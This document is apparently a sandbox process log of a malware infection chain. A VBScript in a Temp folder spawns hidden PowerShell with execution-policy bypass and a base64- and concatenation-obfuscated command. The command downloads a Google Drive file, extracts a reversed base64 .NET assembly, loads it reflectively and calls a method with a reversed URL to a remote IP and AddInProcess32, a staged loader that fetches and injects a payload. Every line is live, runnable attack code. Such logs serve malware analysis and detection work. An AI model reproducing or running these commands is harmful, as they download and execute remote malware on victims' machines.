wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\win78MPDW-constraints.vbs
2536powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWVYKCAoJ3FPJysnNGltYWdlVXJsID0gaDFTaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgaDFTO3FPNHcnKydlYkNsaWVuJysndCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDJysnbCcrJ2llbnQ7cU80aW1hZ2VCeXRlcyA9IHFPNHdlYkNsaWVudC4nKydEb3dubG9hZERhdGEocU80aW1hJysnZ2VVcmwpO3EnKydPNGltYWdlVGV4dCA9IFtTJysneXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHFPJysnNGltYWdlQnl0ZXMpO3FPJysnNHN0YXJ0RmxhZyA9IGgxUzw8QkFTRTY0X1NUQVJUPj5oMVM7cU80ZW5kRmxhZyA9IGgxUzw8QkFTRTY0X0VORD4+aDFTO3FPNHN0YXJ0SW5kZXggPSBxTzRpbWFnZVRlJysneHQuSW5kZXhPZihxTzRzdGFydEZsYWcpO3FPNGVuZEluZGV4ID0gcU80aW1hZ2VUZXh0LkluZGV4T2YocU80ZW5kRmxhZyk7cU80cycrJ3RhcnRJbmRleCAtZ2UgMCAtYW5kIHFPNGVuZEluZGV4IC1ndCBxTzRzdGFydEluZCcrJ2V4O3FPNHN0YXJ0SW5kZXggKz0gcU80c3RhcnRGbGEnKydnLkxlbmd0aDtxTzRiYXNlNjRMZW5ndGggPSBxTzRlbmRJbmRleCAtIHFPNHN0YXJ0SW5kZXg7cU80YmFzZTY0Q29tbWFuZCA9IHFPNGltYWdlVGV4dC5TdWJzdCcrJ3JpbmcocU80c3RhcnRJbmRleCwgcU80YmFzZTY0TGVuZ3RoJysnKTtxTzRiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChxTzRiYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgS3lJIEZvckVhY2gtT2JqZWN0IHsgcU80XyB9KScrJ1stMS4uLShxTzRiYXNlNjRDb21tYW5kLkxlbmd0aCldO3FPNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZScrJ20uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocU80YmFzZTY0UmV2ZXJzZWQpO3FPNGxvYWRlZEEnKydzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChxTzRjb21tYW5kQnl0ZXMpO3FPNHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaDFTVkFJaDFTKTtxTzR2YWlNZXRob2QuSW52b2tlKHFPNG51bGwsIEAoaDFTdHh0LjQ0NDZlc2FiYmJiYmInKydiYmJiZXdtYWRhbS80MzEuODcxLjY0Ljg5MS8vOnB0dGhoMVMsIGgxU2Rlc2F0aXZhZG9oMVMsIGgxU2Rlc2F0aXZhJysnZG9oMVMsIGgxU2Rlc2F0aXZhZG9oMVMsIGgxJysnU0FkZEluUHJvY2VzczMyaDFTLCBoMVMnKydkZXNhdGl2YWRvaDFTLCBoMVNkZXNhdGl2YWRvaDFTLGgxU2Rlc2F0aXZhZG9oMVMsaDFTZGVzYXRpdmFkb2gxUyxoMVNkZXNhdGknKyd2YWRvaDFTLGgxU2Rlc2F0aXZhZG9oMVMsaDFTZGVzYXRpdmFkb2gxUyxoMVMxaDFTLGgxU2Rlc2F0aXZhZG9oMVMpKTsnKS5yZVBsQWNFKChbQ2hhUl0xMTMrW0NoYVJdNzkrW0NoYVJdNTIpLCckJykucmVQbEFjRSgoW0NoYVJdNzUrW0NoYVJdMTIxK1tDaGFSXTczKSxbc3RyaU5nXVtDaGFSXTEyNCkucmVQbEFjRSgoW0NoYVJdMTA0K1tDaGFSXTQ5K1tDaGFSXTgzKSxbc3RyaU5nXVtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
2616powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IeX( ('qO'+'4imageUrl = h1Shttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur h1S;qO4w'+'ebClien'+'t = New-Object System.Net.WebC'+'l'+'ient;qO4imageBytes = qO4webClient.'+'DownloadData(qO4ima'+'geUrl);q'+'O4imageText = [S'+'ystem.Text.Encoding]::UTF8.GetString(qO'+'4imageBytes);qO'+'4startFlag = h1S<<BASE64_START>>h1S;qO4endFlag = h1S<<BASE64_END>>h1S;qO4startIndex = qO4imageTe'+'xt.IndexOf(qO4startFlag);qO4endIndex = qO4imageText.IndexOf(qO4endFlag);qO4s'+'tartIndex -ge 0 -and qO4endIndex -gt qO4startInd'+'ex;qO4startIndex += qO4startFla'+'g.Length;qO4base64Length = qO4endIndex - qO4startIndex;qO4base64Command = qO4imageText.Subst'+'ring(qO4startIndex, qO4base64Length'+');qO4base64Reversed = -join (qO4base64Command.To'+'CharArray() KyI ForEach-Object { qO4_ })'+'[-1..-(qO4base64Command.Length)];qO4commandBytes = [Syste'+'m.Convert]::FromBase64String(qO4base64Reversed);qO4loadedA'+'ssembly = [System.Reflection.Assembly]::Load(qO4commandBytes);qO4vaiMethod = [dnlib.IO.Home].GetMethod(h1SVAIh1S);qO4vaiMethod.Invoke(qO4null, @(h1Stxt.4446esabbbbbb'+'bbbbewmadam/431.871.64.891//:ptthh1S, h1Sdesativadoh1S, h1Sdesativa'+'doh1S, h1Sdesativadoh1S, h1'+'SAddInProcess32h1S, h1S'+'desativadoh1S, h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1Sdesati'+'vadoh1S,h1Sdesativadoh1S,h1Sdesativadoh1S,h1S1h1S,h1Sdesativadoh1S));').rePlAcE(([ChaR]113+[ChaR]79+[ChaR]52),'$').rePlAcE(([ChaR]75+[ChaR]121+[ChaR]73),[striNg][ChaR]124).rePlAcE(([ChaR]104+[ChaR]49+[ChaR]83),[striNg][ChaR]39) )"
2756